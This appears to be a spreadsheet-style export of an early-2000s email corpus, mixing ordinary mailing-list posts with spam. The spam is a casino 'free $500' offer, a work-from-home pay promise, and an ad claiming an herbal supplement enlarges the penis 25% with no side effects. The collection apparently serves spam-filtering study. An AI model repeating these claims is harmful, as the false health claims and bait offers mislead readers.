 &lt;META content="MSHTML 5.00.3315.2870" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY aLink=#ffffff background="http://65.162.84.5/images/tile.gif" bgColor=#000000 
 link=#ffffff text=#ffffff vLink=#ffffff&gt;
 &lt;TABLE align=center border=1 borderColor=#ffcc00 cellPadding=0 cellSpacing=0 
 width=600&gt;
   &lt;TBODY&gt;
   &lt;TR bgColor=#feb710&gt;
     &lt;TD&gt;
       &lt;DIV align=center&gt;&lt;A 
       href="http://65.162.84.5/perl/051002_02.pl"&gt;&lt;IMG 
       border=0 height=60 src="http://65.162.84.5/images/max_showgirl_468.gif" 
       width=468&gt;&lt;/A&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#000000 height=636 vAlign=top&gt;
       &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width=600&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD height=25 width=191&gt;
             &lt;DIV align=center&gt;&lt;A 
             href="http://65.162.84.5/perl/051002_02.pl"&gt;&lt;IMG 
             border=0 height=124 src="http://65.162.84.5/images/top-money.jpg" 
             width=150&gt;&lt;/A&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD height=25 width=192&gt;
             &lt;DIV align=center&gt;&lt;A 
             href="http://65.162.84.5/perl/051002_02.pl"&gt;&lt;IMG 
             border=0 height=150 src="http://65.162.84.5/images/logo_maxim.gif" 
             width=150&gt;&lt;/A&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD height=25 width=217&gt;
             &lt;DIV align=center&gt;&lt;A 
             href="http://65.162.84.5/perl/051002_02.pl"&gt;&lt;IMG 
             border=0 height=124 src="http://65.162.84.5/images/top-money.jpg" 
             width=150&gt;&lt;/A&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3 height=200&gt;
             &lt;BLOCKQUOTE&gt;
               &lt;P align=center&gt;&lt;FONT color=#ff0000 
               face="Arial, Helvetica, sans-serif" size=4&gt;&lt;A 
               href="http://65.162.84.5/perl/051002_02.pl"&gt;&lt;FONT 
               color=#fd0000&gt;CLICK HERE TO GET YOUR FREE 
               $500&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
               &lt;P align=center&gt;&lt;FONT face="Arial, Helvetica, sans-serif" 
               size=2&gt;&lt;B&gt;$$$ Maxim Sportsbook and Casino are proud to announce 
               that you get up to $500 with every new Casino and Sportsbook Account 
               created $$$&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
               &lt;P align=center&gt;&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif" 
               size=2&gt;$$$ We will also honour a FREE 2-3 night vacation for you 
               and a loved one. That's right!..not only do you get a Fantastic 
               betting account at a GREAT book you also get a FREE vacation 
               $$$&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
               &lt;P align=center&gt;&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif" 
               size=2&gt;Sick of loosing money on casino games then don't be sick 
               any more as Maxim Casino has one of the highest payouts in the 
               industry.&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
               &lt;P align=center&gt;&lt;A 
               href="http://65.162.84.5/perl/051002_02.pl"&gt;&lt;IMG 
               border=0 height=226 src="http://65.162.84.5/images/money.jpg" 
               width=250&gt;&lt;/A&gt;&lt;/P&gt;&lt;/BLOCKQUOTE&gt;
             &lt;DIV align=center&gt;
             &lt;P&gt;&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif" size=3&gt;&lt;A 
             href="http://65.162.84.5/perl/051002_02.pl"&gt;MAXIM 
             SPORTSBOOK AND CASINO&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT color=#ff0000 face="Arial, Helvetica, sans-serif" size=4&gt;&lt;A 
             href="http://65.162.84.5/perl/051002_02.pl"&gt;&lt;FONT 
             color=#f90000&gt;CLICK HERE TO GET YOUR FREE 
             VACATION&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;p&gt;&lt;font size=-1 color=white&gt;This email is not sent unsolicited. You opted-in with CNN-SI. You are receiving it because you requested to receive this email by opting-in with our marketing partner. You will receive notices of exciting offers, products, and other options! However, we are committed to only sending to those people that desire these offers. If you do not wish to receive such offers 
 &lt;a href="http://65.162.84.5/perl/unsubscribe.pl?s=20020511002124000000703384"&gt;&lt;b&gt;&lt;font size="-1" color = yellow&gt;Click Here.&lt;/font&gt;&lt;/b&gt;&lt;/a&gt; or paste the following into any browser:&lt;/p&gt; http://65.162.84.5/perl/unsubscribe.pl?s=20020511002124000000703384 &lt;br&gt;&lt;br&gt;&lt;p&gt; to remove your email name from our list. You may contact our company by mail at 1323 S.E. 17th Street, Suite Number 345, Ft. Lauderdale, Fl 33316&lt;/p&gt; 
 &lt;img src="http://65.162.84.5/perl/r_open1.pl?serialno=20020511002124000000703384"&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Ah, THIS is the car i've seen on discovery channel, but url via a lurker.
 http://arivettracing.com/battery.html
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Jeremy Zawodny who works at Yahoo Finance offers an RSS 0.91 feed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:12:45:28PM
 Date: Mon, 23 Sep 2002 19:45:28 GMT
 Jeremy Zawodny[1] who works at Yahoo Finance offers an RSS 0.91 feed for every 
 stock. It's a beta feature. Here's the feed for Microsoft[2] and one for 
 Marimba[3]. Thanks to Jon Udell[4] for the pointer. Nice. Jon also notes that 
 Microsoft doesn't show up too strong in the weblog world and describes[5] a 
 conversation with John Montgomery about this. What a small world. John and I 
 got to know each other when we did the work on SOAP in the late 90s, and weblog 
 software is one of the major reasons we were interested in SOAP. So close, but 
 so far. But it's never too late!
 [1] http://jeremy.zawodny.com/blog/archives/000187.html
 [2] http://rss.finance.yahoo.com/rss/get?ticker=MSFT
 [3] http://rss.finance.yahoo.com/rss/get?ticker=MRBA
 [4] http://weblog.infoworld.com/udell/2002/09/23.html#a422
 [5] http://weblog.infoworld.com/udell/2002/09/23.html#a421
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IMG: http://www.joelonsoftware.com/pictures/dhtml2d.jpg (Dynamic
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20021009.html
 Date: Not supplied
 [IMG: http://www.joelonsoftware.com/pictures/dhtml2d.jpg (Dynamic HTML, 2d 
 Edition)][1]Ah! Danny Goodman has released the new version of Dynamic HTML[2]. 
 It's been a few years since the first edition, which is _still_ the best 
 reference on HTML despite being severely out of date. The new edition is 1400 
 packed pages that actually tells you what web browsers that are actually in use 
 actually do, which makes it invaluable. It has been brought up to date with all 
 the latest browsers and the newest HTML specs. If you're working with HTML 
 in any way, shape, or form, this book is an absolute requirement.
 [1] http://www.amazon.com/exec/obidos/tg/detail/-/0596003161/joelonsoftware/ref=nosim
 [2] http://www.amazon.com/exec/obidos/tg/detail/-/0596003161/joelonsoftware/ref=nosim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: How about subsidizing SSL access to Google?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday, September 23, 2002, at 06:51 PM, Tom wrote:
 &gt; Bascialy give china no choise but to shoot its own head off to stop the
 &gt; music.
 Or we could have the audacity to tell them to shape up or get cut out 
 of the global marbles game. Unfortunately that model only seems to 
 apply to despots with oil and WMDs, rather than despots with WMDs.
 -- whump
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Webdev] Migrating TO W2K
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, I know, dreadful subject. However, because of customer inistence we
 must deploy one project on W2K. This will thus be a WAMP project rather than
 a LAMP project. Of course as a highly skilled *ix person I can handle these
 Windows toys :-) but can anyone suggest any good educational resources for
 using Apache, PHP, Perl and MySQL together on W2K. Anyone had to do the same
 and found any particular nasty gotchas (yes, I know about the running
 Microsoft software one).
 Niall
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Pungenday, the 9th day of Bureaucracy, Padraig Brady confessed:
 &gt; How can I repeat a string an arbitrary number
 &gt; of times in bash/sed/...
 &gt;
 &gt; I.E. I'm missing the repeat in the following:
 &gt;
 &gt; STRING="&gt; "
 &gt; NUMBER=3
 &gt; PREFIX=repeat $STRING $NUMBER
 &gt; echo $PREFIX
 &gt; &gt; &gt; &gt;
 perl ?
   STRING="&gt; "
   NUMBER=3
   PREFIX=`perl -e "print '$STRING' x $NUMBER;"`
   echo $PREFIX
 I'm pretty sure the bsd 'jot' utility can do this too, but I don't
 have it to hand.
 -kev
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Here Come Da Feds
</t>
  </si>
  <si>
    <t xml:space="preserve">The damn Federalists are at it again, another bumsrush on Oregons states
 rights..
 [Being a 5 year translplant out here I say the best thing to do is bring
 back the plans to make the state of Jefferson, then have Oregon,
 Washington and Jefferson break away from the union.]
 http://www.cnn.com/2002/LAW/09/23/oregon.assisted.suicide/
 SAN FRANCISCO, California (CNN) -- The U.S.
 Justice Department filed an appeal Monday to
 overturn a federal judge's ruling that
 upheld Oregon's doctor-assisted suicide law.
 A spokesman for Oregon Attorney General
 Hardy Myers said the state views the appeal
 as "same story, different day."
 Oregon voters approved doctor-assisted
 suicide twice, in ballot initiatives in 1994
 and 1997. But in November, U.S. Attorney
 General John Ashcroft warned Oregon doctors
 they would be prosecuted under federal law
 if they prescribed lethal doses of drugs for
 dying patients.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Paycheck!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table cellSpacing="0" cellPadding="2" width="475" border="0" bgcolor="#000000"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td vAlign="top" width="275"&gt;
         &lt;p align="left"&gt;&lt;br&gt;
         &lt;i&gt;&lt;font color="#FFFFFF" face="Arial" size="5"&gt;Work From Home Resources&amp;nbsp;&lt;/font&gt;&lt;/i&gt;&lt;/p&gt;
       &lt;/td&gt;
       &lt;td vAlign="top" width="200" height="88"&gt;
         &lt;p align="center"&gt;&lt;img border="0" src="http://gif.national-adv.com/corner8c.jpeg" align="right" hspace="2" vspace="1" width="143" height="86"&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td vAlign="top" width="402" bgcolor="#999966" rowspan="3"&gt;&amp;nbsp;
         &lt;p&gt;&lt;b&gt;We are desperately need responsible, dependable people through the
         United States to fill full and part time positions working from their
         home &lt;u&gt;&lt;font size="4"&gt;making $500-$1250 a week!&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;Benefits:&lt;/b&gt;&lt;/p&gt;
         &lt;ul&gt;
           &lt;li&gt;&lt;b&gt;Set your own schedule&lt;/b&gt;&lt;/li&gt;
           &lt;li&gt;&lt;b&gt;Spend more time with your &lt;/b&gt;&lt;b&gt;family&lt;/b&gt;&lt;/li&gt;
           &lt;li&gt;&lt;b&gt;No more long commute&lt;/b&gt;&lt;/li&gt;
           &lt;li&gt;&lt;b&gt;Make more money!&lt;/b&gt;&lt;/li&gt;
         &lt;/ul&gt;
         &lt;p&gt;&lt;b&gt;If you have computer and internet access and can work
         unsupervised, this is the opportunity for you!&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;Click here to feel out our free application and we will get you
         started today!&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;We will even give you a &lt;font color="#FF0000" size="4"&gt; FREE VACATION&lt;/font&gt; to enjoy just for visiting
         filling out our free application today.&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;Don't wait, positions have already closed in 13 states.&lt;/b&gt;&lt;/p&gt;
         &lt;p align="center"&gt;&lt;b&gt;&lt;font size="5"&gt;&lt;a href="http://optin.national-adv.com/moym/"&gt;Apply today for Free and Get your
         Free Vacation!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align="center"&gt; &lt;img src="http://gif.national-adv.com/hotel.gif" width="149" border="2"&gt;&lt;/p&gt;
         &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;Sincerely,&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;Tex Sryder&lt;br&gt;Work From Home &lt;/b&gt;&lt;b&gt;Specialist&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p&gt;&lt;a href="http://optin.national-adv.com/unsubscribe"&gt;CLick Here To Unsubscribe From Our Mailing List&lt;/a&gt;&lt;/p&gt;
       &lt;/td&gt;
       &lt;td vAlign="top" width="198" bgcolor="#999966" height="313"&gt;
         &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p align="center"&gt;&lt;img src="http://gif.national-adv.com/momkid.jpg" border="0" width="199" height="154"&gt;&lt;b&gt;&lt;font size="5"&gt;&lt;br&gt;&lt;/font&gt;&lt;font size="2"&gt;Earn
         what your worth, work from home!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td vAlign="top" width="198" bgcolor="#999966" height="534"&gt;
         &amp;nbsp;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td vAlign="top" width="198" bgcolor="#999966"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;table cellSpacing="0" cellPadding="0" width="600" bgColor="#e1e1e1" border="0"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 qdaakglj&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Increase your penis size 25% in 2 weeks!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Have a BLAST in bed&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;font size="6"&gt;Have a BLAST in bed,
 GUARANTEED!&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;&lt;img
 src="http://zaleos.com/affiliate3/images/leftmax.gif" border="0"
 width="200" height="496" /&gt;&lt;img
 src="http://zaleos.com/affiliate3/images/middlemax.gif" border="0"
 width="220" height="496" /&gt;&lt;img
 src="http://zaleos.com/affiliate3/images/rightmax.gif" border="0"
 width="200" height="496" /&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;table width="75%" align="center"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;
 &lt;font size="2"&gt;Finally, a safe and natural penile enlargement
 supplement!&lt;br /&gt;
  Naturally boost your sex drive and rejuvenate sexual
 function.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;&lt;img src="http://zaleos.com/affiliate3/images/thumbsup.jpg"
 align="left" width="218" height="301" /&gt;Good news, men! Recent
 discoveries in herbal medicine have made it possible for men to
 safely and effectively boost their sexual vitality while increasing
 their penis size by 25% or more!&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;Certified Natural Laboratories is pleased to introduce the
 latest addition to their widely acclaimed line of herbal
 supplements: &lt;i&gt;&lt;b&gt;Maxaman&amp;#8482;.&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;Specially formulated with herbs and extracts from around
 the globe, Maxaman&amp;#8482; can help to enhance sexual sensitivity,
 increase sexual stamina, and actually increase the size of your
 penis by up to 25%. The special blend of herbs in Maxaman&amp;#8482;
 have been shown to boost blood flow to the penis, thus expanding
 the sponge-like erectile tissue in the penis, leading to size gains
 in both length and thickness.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;A
 recent survey showed that 68% of women are unsatisfied with the
 size of their partners. Of course most of these women would never
 tell their partner that they are unhappy with their penis size.
 Having a small or average-sized penis can result in depression and
 feelings of inadequacy. Thankfully, men of all ages can now safely
 and naturally increase the size of their penis and renew sexual
 vitality without resorting to dangerous surgery.&lt;/font&gt;&lt;/p&gt;
 &lt;table width="570" align="center"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;div align="center"&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;What To
 Expect:&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;&lt;b&gt;1-2 weeks&lt;/b&gt;&lt;br /&gt;
  Most men notice more powerful and longer lasting erections almost
 immediately. A noticeable increase in thickness is also
 common.&lt;br /&gt;
 &lt;br /&gt;
  &lt;b&gt;3-8 weeks&lt;/b&gt;&lt;br /&gt;
  By this point you should be able to notice an increase in
 thickness in both erect and flaccid states, as well as an overall
 increase in length.&lt;br /&gt;
 &lt;br /&gt;
  &lt;b&gt;9 weeks +&lt;/b&gt;&lt;br /&gt;
  After nine weeks, your penis should be noticeably larger in both
 length and girth.&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;#160;&lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;Below is a comparison chart compiled from the most recent
 data on penis size. See how you measure up...&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;img
 src="http://zaleos.com/affiliate3/images/chart.gif" align="right"
 width="231" height="165" /&gt;&lt;b&gt;&lt;i&gt;How to measure your penis size
 correctly:&lt;/i&gt;&lt;/b&gt; To determine length, measure the erect penis
 from the base of the penis where the top of the shaft meets the
 pubic area (the peno-pubic junction) to the tip of the head. For
 uncircumcised men the foreskin should be retracted. To determine
 width, measure at mid-shaft around the circumference while the
 penis is erect.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Whether you have a small, average or large penis, it is now
 possible for you to increase the size of your penis by up to 25%
 without resorting to dangerous surgery or cumbersome
 weights.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;The
 all-natural proprietary blend of unique herbs found in Maxaman is
 designed to restore blood flow, unleash stored testosterone, and
 heighten sensation by activating the body's natural hormone
 production and supplying vital nutrients necessary for peak sexual
 performance. All of the ingredients in Maxaman are stringently
 scrutinized, and are guaranteed to be of the highest pharmaceutical
 grade.&lt;/font&gt;&lt;/p&gt;
 &lt;table cellspacing="4" cellpadding="4" width="95%" align="center"
 border="0"&gt;
 &lt;tbody&gt;
 &lt;tr valign="top" align="left" bordercolor="#ffffff"
 bgcolor="#ffffff"&gt;
 &lt;td height="376"&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font
 color="#006699"&gt;1. How does Maxaman
 work?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;The all
 natural proprietary blend of unique ingredients found in Maxaman is
 designed to restore blood flow, unleash stored testosterone, and
 heighten sensation by activating the body's natural hormone
 production and supplying vital nutrients necessary for peak sexual
 performance. The special blend of herbs in Maxaman have been shown
 to boost blood flow to the penis, thus expanding the sponge-like
 erectile tissue in the penis, leading to size gains in both length
 and thickness.&lt;/font&gt; 
 &lt;p&gt;&lt;font face="arial" color="#006699" size="+0"&gt;&lt;b&gt;&lt;i&gt;2. Is Maxaman
 safe?&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Because
 Maxaman is an all natural nutritional supplement containing only
 the finest botanicals, there are no harmful side effects when taken
 as directed. Maxaman is not a pharmaceutical drug and contains none
 of the synthetic chemicals found in prescription medications. It is
 a safe alternative to dangerous surgery.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;3. What
 can Maxaman do for me?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Common benefits
 from using Maxaman include:&lt;br /&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif"
 size="-1"&gt;Up to a 25% increase in penis length and thickness&lt;br /&gt;
  Increased stamina&lt;br /&gt;
  Improved sexual desire&lt;br /&gt;
  Stronger, more powerful erections&lt;br /&gt;
  Greater control over ejaculation&lt;br /&gt;
  Stronger climaxes and orgasms&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;4. Will
 I experience any side effects?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;There
 are no harmful side effects when taken as directed.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" color="#0066cc" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font
 color="#006699"&gt;5. What ingredients are used in
 Maxaman?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;Maxaman is all natural, and made from the finest quality
 botanicals available. To read more about each of these key
 ingredients, please read below for all the details.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;6. How
 should I use Maxaman?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;The normal
 dosage of Maxaman is two capsules with a meal and a glass of water.
 The cumulative effects of Maxaman increase with each dosage, making
 it even more effective with continued use. Do not exceed six
 capsules daily&lt;/font&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif"
 size="2"&gt;.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;7. Do I
 need a prescription to use Maxaman?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;No you do not.
 Because Maxaman is an all natural nutritional supplement containing
 only the finest botanicals, there is no need to obtain a
 prescription.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;8. How
 does Maxaman differ from other penis lengthening
 procedures?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Maxaman is not
 a pharmaceutical drug and contains none of the synthetic chemicals
 found in prescription medications. It is an all natural formula
 designed to boost blood flow to the penis, thus expanding the
 sponge-like erectile tissue in the penis, leading to size gains in
 both length and thickness. Maxaman provides men with a safe and
 natural alternative to potentially dangerous
 surgery.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;9. How
 long will it take to get my order?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font size="-1"&gt;Shipped the same day payment is received in most
 cases..&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" color="#3366cc" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font
 color="#0069c0"&gt;10. Is it really safe to order
 online?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Absolutely!
 All information about your order is encrypted, and cannot be viewed
 by anyone else. Ordering online using this state-of-the-art
 processing system is actually much safer than using your credit
 card in a restaurant or at the mall.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;11. Is
 Maxaman shipped discreetly?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
  &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;Yes it is!
 Maxaman is sent in an unmarked box with no indication whatsoever as
 to what is contained inside.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="arial" size="+0"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#006699"&gt;11. How
 much is shipping and handling?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font
 face="arial"&gt;&lt;br /&gt;
 &lt;/font&gt; &lt;font face="Arial, Helvetica, sans-serif" size="-1"&gt;
 $6.95&lt;font size="3"&gt; for the 1st. bottle&lt;/font&gt; and free for any
 order more than 1 bottle.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="3"&gt;&amp;#160;&lt;/font&gt;&lt;/p&gt;
 &lt;table cellspacing="4" cellpadding="4" width="95%" align="center"
 border="0"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td valign="top" align="middle"&gt;
 &lt;div align="left"&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;The special
 blend of herbs in &lt;b&gt;Maxaman&lt;/b&gt;&amp;#8482; have been shown to boost
 blood flow to the penis, thus expanding the sponge-like erectile
 tissue in the penis, leading to size gains in both length and
 thickness.&lt;br /&gt;
  &amp;#160;&lt;/font&gt; 
 &lt;p align="center"&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font
 face="Arial, Helvetica, sans-serif"&gt;The proprietary blend of herbs
 found in Maxaman&amp;#8482; consists of:&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Zinc (as zinc oxide)&lt;/b&gt; - This essential mineral is required for
 protein synthesis and collagen formation. Sufficient intake and
 absorption of zinc are needed to maintain a proper concentration of
 Vitamin E.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Yohimbe&lt;/b&gt; - Used traditionally to treat impotence and frigidity,
 Yohimbe helps to increase blood flow and sensitivity of nerves,
